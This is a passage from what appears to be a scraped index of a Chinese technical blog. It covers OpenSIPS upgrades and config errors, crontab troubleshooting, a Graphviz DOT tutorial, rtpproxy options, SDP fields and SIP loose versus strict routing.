error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bare word \u0026lt;uri\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file 
/usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bare word \u0026lt;myself\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 37-39: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 54-55: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: Jul 18 19:37:23 [28181] ERROR:core:main: bad config file (26 errors) Jul 18 19:37:23 [28181] NOTICE:core:main: Exiting.... 
","permalink":"https://wdd.js.org/opensips/ch3/centos7-2.4/","summary":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。","title":"opensips centos7 安装与升级"},{"content":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每隔多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每个周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9-18 * * 1-5 喝水 每隔 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔 15 秒 * * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 为什么 crontab 指定的脚本没有执行? 
有以下可能原因\n没有权限执行某个命令 某个命令不在环境变量中,无法找到对应命令 首先你必须测试一下,你的脚本不使用 crontab 能否正常执行。\n大部分 crontab 执行不成功,都是因为环境变量的问题。\n下面写个例子:\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log cd /root sh test.sh crontab -e 将 test.sh 加入 crontab 中\n* * * * * sh /root/test.sh centos crontab 的执行日志在/var/log/cron 中,可以查看执行日志。\n我的机器是树莓派,没有这个文件,但是我是把执行输出到/root/test.log 中的,可以查看这个文件\n可以看到虽然输出了时间,但是并没有输出 opensips 的版本\nMon 1 Jul 13:04:01 BST 2019 Mon 1 Jul 13:05:01 BST 2019 将$PATH 也加入输出,发现Mon 1 Jul 13:10:01 BST 2019 /usr/bin:/bin,而 opensips 这个命令是位于/usr/local/sbin 下,所以无法找到执行文件,当然无法执行\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 那还不好办吗?\n在当前工作目录执行 echo $PATH, 然后在脚本里设置一个环境变量就能搞定\n#!/bin/bash PATH=\u0026#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0026#39; now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 也可以使用 journalctl -t CROND 查看 crond 的日志\n检查 crontab 是否运行 systemctl status crond systemctl restart crond 在 alpine 中执行 crontab alpine 中没有 systemctl, 需要启动 crond 的守护进程,否则程序定时任务是不会执行的\n#!/bin/sh # start cron /usr/sbin/crond -f -l 8 ","permalink":"https://wdd.js.org/shell/crontab-tips/","summary":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每隔多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每个周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9-18 * * 1-5 喝水 每隔 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1.","title":"长太息以掩涕兮,哀crontab之难用"},{"content":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显示出图片 digraph用来标记有向图,里面只能用-\u0026gt; 不能用\u0026ndash;, 否则无法显示出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 
graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。\ngraph easy{ a [shape=parallelogram] b [shape=egg] a--b; } 还有什么布局姿势? 默认图是从上到下画的,你可以用rankdir = LR来让图从左往右绘制\ndigraph easy { rankdir = LR; a -\u0026gt; b; } 当然,还有其他姿势\nrankdir\nLR 从左往右布局 RL 从右往左布局 TB 从上往下布局(默认) BT 从下往上布局 多来几个圆,看看效果 digraph easy { rankdir = LR; a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 怎么加注释? 支持两种注释\n// /**/ digraph easy { a -\u0026gt; b; // 从a到b b -\u0026gt; c; /* 从b到c */ } 句尾要不要加分号? 答:分号不是必须的,你随意\n如何起个别名? 
不起别名的时候,名字太长,引用不方便。\ngraph easy{ \u0026#34;直到确定,手的温度来自你心里\u0026#34;--\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;; \u0026#34;这一刻,也终于勇敢说爱你\u0026#34; -- \u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34; } 起个别名,快速引用\ngraph easy{ a [label=\u0026#34;直到确定,手的温度来自你心里\u0026#34;]; b [label=\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;]; c [label=\u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34;] a -- b; b -- c; } 统一设置点线的样式 digraph easy{ rankdir = LR; node [color=Red,shape=egg] edge [color=Pink, style=dashed] a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 加点颜色 digraph easy{ bgcolor=Pink; b [style=filled, fillcolor=yellow, center=true] a-\u0026gt;b; } 禁用关键词 下面的关键词,不区分大小写,不能作为节点的名字,如果你用了,你的图就画不出来\nnode, edge, graph, digraph, subgraph, and strict\n下面的写法会导致绘图失败\ngraph a { node -- edge } 但是关键词可以作为Label\ngraph a { a [label=\u0026#34;node\u0026#34;] b [label=\u0026#34;edge\u0026#34;] a -- b } 快捷方式 - 串起来 # 方式1 两点之间一个一个连接 digraph { a -\u0026gt; b; b -\u0026gt; c; c -\u0026gt; d; } # 方式2 直接串起来所有的点 digraph { a -\u0026gt; b -\u0026gt; c -\u0026gt; d; } # 方式3 直接串起来所有的点, 也可换行 digraph { a-\u0026gt;b -\u0026gt;c -\u0026gt;d -\u0026gt;e; } 对比发现,直接串起来的话,更简单,速度更快。对于无向图 也可以用 a -- b -- c -- d 的方式串起来。\n快捷方式 - 大括号 对于上面的图,也有两种绘制方法。用大括号的方式明显更好呀! 😺\n# 方式1 digraph { a -\u0026gt; b; a -\u0026gt; c; a -\u0026gt; d; b -\u0026gt; z; c -\u0026gt; z; d -\u0026gt; z; } # 方式2 digraph { a -\u0026gt; {b;c;d} {b;c;d} -\u0026gt; z } 数据结构 UML 怎么画呀? 比如说下面的typescript数据结构\ninterface Man { name: string; age: number; isAdmin: boolean } interface Phone { id: number; type: string; } 注意:node [shape=\u0026ldquo;record\u0026rdquo;]\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|age:number|isAdmin:boolean}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|type:string}\u0026#34;] } 数据结构之间的关系如何表示? 
锚点 例如Man类型有个字段phone, 是Phone类型的\ninterface Man { name: string; age: number; isAdmin: boolean; phone: Phone } interface Phone { id: number; type: string; } interface Plain { key1:aaa; key2:bbb; } 注意lable里面的内容,其中\u0026lt;\u0026gt;这个符号可以理解为一个锚点。\nman:age-\u0026gt;plain:key1 这个意思是man的age锚点连接到plain的key1锚点。\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|\u0026lt;age\u0026gt;age:number|isAdmin:boolean|\u0026lt;phone\u0026gt;phone:Phone}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|\u0026lt;type\u0026gt;type:string}\u0026#34;] plain[label=\u0026#34;{Plain|\u0026lt;key1\u0026gt;key1:aaa|key2:bbb}\u0026#34;] man:phone-\u0026gt;phone man:age-\u0026gt;plain:key1 [color=\u0026#34;red\u0026#34;] phone:type-\u0026gt;plain:key1 } hash 链表 digraph { rankdir=LR; node [shape=\u0026#34;record\u0026#34;,height=.1, width=.1]; node0 [label = \u0026#34;\u0026lt;f0\u0026gt;a |\u0026lt;f1\u0026gt;b |\u0026lt;f2\u0026gt;c|\u0026#34;, height=2.5]; node1 [label = \u0026#34;{\u0026lt;n\u0026gt; a1 | a2 | a3 | a4 |\u0026lt;p\u0026gt; }\u0026#34;]; node2 [label = \u0026#34;{\u0026lt;n\u0026gt; b1 | b2 |\u0026lt;p\u0026gt; }\u0026#34;]; node3 [label = \u0026#34;{\u0026lt;n\u0026gt; c1 | c2 |\u0026lt;p\u0026gt; }\u0026#34;]; node0:f0-\u0026gt;node1:n [headlabel=\u0026#34;a link\u0026#34;] node0:f1-\u0026gt;node2:n [headlabel=\u0026#34;b link\u0026#34;] node0:f2-\u0026gt;node3:n [headlabel=\u0026#34;c link\u0026#34;] } label {}的作用 digraph { node [shape=\u0026#34;record\u0026#34;]; node0 [label = \u0026#34;0|a|b|c|d|e\u0026#34;,height=2.5]; node1 [label = \u0026#34;{1|a|b|c|d|e}\u0026#34;,height=2.5]; } 对于record而言\n有{} , 则属性作用于整体 无{}, 则属性作用于个体 分组子图 subgraph 关键词标记分组 组名必需以cluster开头 graph { rankdir=LR node [shape=\u0026#34;box\u0026#34;] subgraph cluster_1 { label=\u0026#34;network1\u0026#34;; bgcolor=\u0026#34;mintcream\u0026#34;; host_11 [label=\u0026#34;router\u0026#34;]; host_12; host_13; } subgraph cluster_2 { label=\u0026#34;network2\u0026#34;; 
bgcolor=\u0026#34;mintcream\u0026#34;; host_21 [label=\u0026#34;router\u0026#34;]; host_22; host_23; } host_12--host_11; host_13--host_11; host_11--host_21; host_22--host_21; host_23--host_21; } 流程图 二等车厢座位示意图 digraph{ label=\u0026#34;二等车厢座位示意图\u0026#34; node [shape=record]; struct3 [ shape=record, label=\u0026#34;车窗|{ {01A|01B|01C}| {02A|02B|02C}| {03A|03B|03C} } |过道|{ {01D|01F}| {02D|02F}| {03D|03F} }|车窗\u0026#34; ]; } Node Port 可以使用nodePort来调整目标的连接点, node Port可以理解为地图上的东南西北。\nn | w\u0026lt;----+----\u0026gt; e | s digraph { rankdir=LR node [shape=box] a-\u0026gt;b:n [label=n] a-\u0026gt;b:ne [label=ne] a-\u0026gt;b:e [label=e] a-\u0026gt;b:se [label=se] a-\u0026gt;b:s [label=s] a-\u0026gt;b:sw [label=sw] a-\u0026gt;b:w [label=w] a-\u0026gt;b:nw [label=nw] } 电磁感应线圈 \u0026lt;\u0026gt;可以用来自定义锚点,锚点可以用来连线。\ndigraph{ node [shape=record]; edge[style=dashed] t [style=filled;fillcolor=gray;label=\u0026#34;\u0026lt;l\u0026gt;N| |||||||\u0026lt;r\u0026gt;S\u0026#34;] t:l-\u0026gt;t:r [color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] } 三体纠缠 digraph{ nodesep=.8 ranksep=1 rankdir=TD node[shape=circle] edge [style=dashed] a[style=filled;fillcolor=red;label=\u0026#34;\u0026#34;;color=red] b[style=filled;fillcolor=red2;label=\u0026#34;\u0026#34;;color=red2] c[style=filled;fillcolor=red4;label=\u0026#34;\u0026#34;;color=red4] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] 
c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] } 二叉树 digraph { node [shape = record,height=.1]; t0 [label=\u0026#34;\u0026lt;l\u0026gt;|9|\u0026lt;r\u0026gt;\u0026#34;] t1 [label=\u0026#34;\u0026lt;l\u0026gt;|1|\u0026lt;r\u0026gt;\u0026#34;] t5 [label=\u0026#34;\u0026lt;l\u0026gt;|5|\u0026lt;r\u0026gt;\u0026#34;] t6 [label=\u0026#34;\u0026lt;l\u0026gt;|6|\u0026lt;r\u0026gt;\u0026#34;] t11 [label=\u0026#34;\u0026lt;l\u0026gt;|11|\u0026lt;r\u0026gt;\u0026#34;] t34 [label=\u0026#34;\u0026lt;l\u0026gt;|34|\u0026lt;r\u0026gt;\u0026#34;] t0:l-\u0026gt;t5 t0:r-\u0026gt;t11 t5:l-\u0026gt;t1 t5:r-\u0026gt;t6 t11:r-\u0026gt;t34 } 水平分层 相关的节点,可以使用rank属性,使其分布在相同的水平层次。\ndigraph{ nodesep=.3 ranksep=.8 node [shape=none] 应用层 -\u0026gt; 运输层 -\u0026gt; 网络层 -\u0026gt; 链路层; node [shape=box]; http;websocket;sip;ssh; tcp;udp; icmp;ip;igmp; arp;rarp; {rank=same;应用层;http;websocket;sip;ssh} {rank=same;运输层;tcp;udp} {rank=same;网络层;icmp;ip;igmp} {rank=same;链路层;arp;硬件接口;rarp} http-\u0026gt;tcp websocket-\u0026gt;tcp; sip-\u0026gt;tcp; sip-\u0026gt;udp; ssh-\u0026gt;tcp; tcp-\u0026gt;ip; udp-\u0026gt;ip; ip-\u0026gt;igmp; icmp-\u0026gt;ip; ip-\u0026gt;硬件接口; arp-\u0026gt;硬件接口; 硬件接口-\u0026gt;rarp; } 最后挑战,画个小人 digraph easy{ nodesep = 0.5 header [shape=circle, label=\u0026#34;^_^\u0026#34;, style=filled, fillcolor=pink] body [shape=invhouse, label=\u0026#34;~ ~\\n~ ~\\n~ ~\u0026#34;, center=true, style=filled, fillcolor=peru] leftHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] leftFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] header-\u0026gt;body [arrowhead=crow]; body-\u0026gt;leftHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, tailport=ne]; body-\u0026gt; rightHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, 
tailport=nw]; body -\u0026gt; leftFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] body -\u0026gt; rightFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] } 还有哪些颜色可以使用呢? 颜色预览:http://www.graphviz.org/doc/info/colors.html\n还有哪些箭头的样式可以用呢? 我的图没预览出来,怎么办? 一般来说,如果图没有渲染出来,都是因为绘图语法出问题了。\n我刚刚开始用的时候,就常常把\u0026ndash;用在有向图中,导致图无法预览。建议官方可以把报错信息提示给用户。\n目前来说,这个错误信息只在控制台中打印了,需要按F12打开浏览器的console界面。看看哪里出错了,然后找到对应的位置修改。\n参考 https://graphviz.gitlab.io/_pages/pdf/dotguide.pdf https://casatwy.com/shi-yong-dotyu-yan-he-graphvizhui-tu-fan-yi.html 附件 dotguide.pdf\n","permalink":"https://wdd.js.org/posts/2019/06/","summary":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显示出图片 digraph用来标记有向图,里面只能用-\u0026gt; 不能用\u0026ndash;, 否则无法显示出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。","title":"Graphviz教程 你学废了吗?"},{"content":"rtpproxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和哪些软件集成? 
opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpproxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpproxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.rtpproxy.org/doc/master/user_manual.html https://github.com/sippy/rtpproxy ","permalink":"https://wdd.js.org/opensips/ch9/rtpproxy/","summary":"rtpproxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和哪些软件集成? opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpproxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpproxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.","title":"rtpproxy学习"},{"content":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of 
description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an \u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","permalink":"https://wdd.js.org/opensips/ch9/sdp/","summary":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an 
\u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","title":"sdp协议简介"},{"content":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","permalink":"https://wdd.js.org/opensips/ch9/books/","summary":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","title":"参考资料与书籍"},{"content":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transaction t_check_trans() ","permalink":"https://wdd.js.org/opensips/ch5/stateful-stateless/","summary":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transaction t_check_trans() ","title":"有状态和无状态路由"},{"content":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下面的sip消息中Route字段中带有**lr, 
**则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com #2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.example.com;lr\u0026gt;,\u0026lt;sip:p2.domain.com;lr\u0026gt; #8 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; #9 bye BYE sip:callee@u2.domain.com SIP/2.0 Traversing a Strict-Routing Proxy ","permalink":"https://wdd.js.org/opensips/ch5/strict-loose-routing/","summary":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, **则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com 
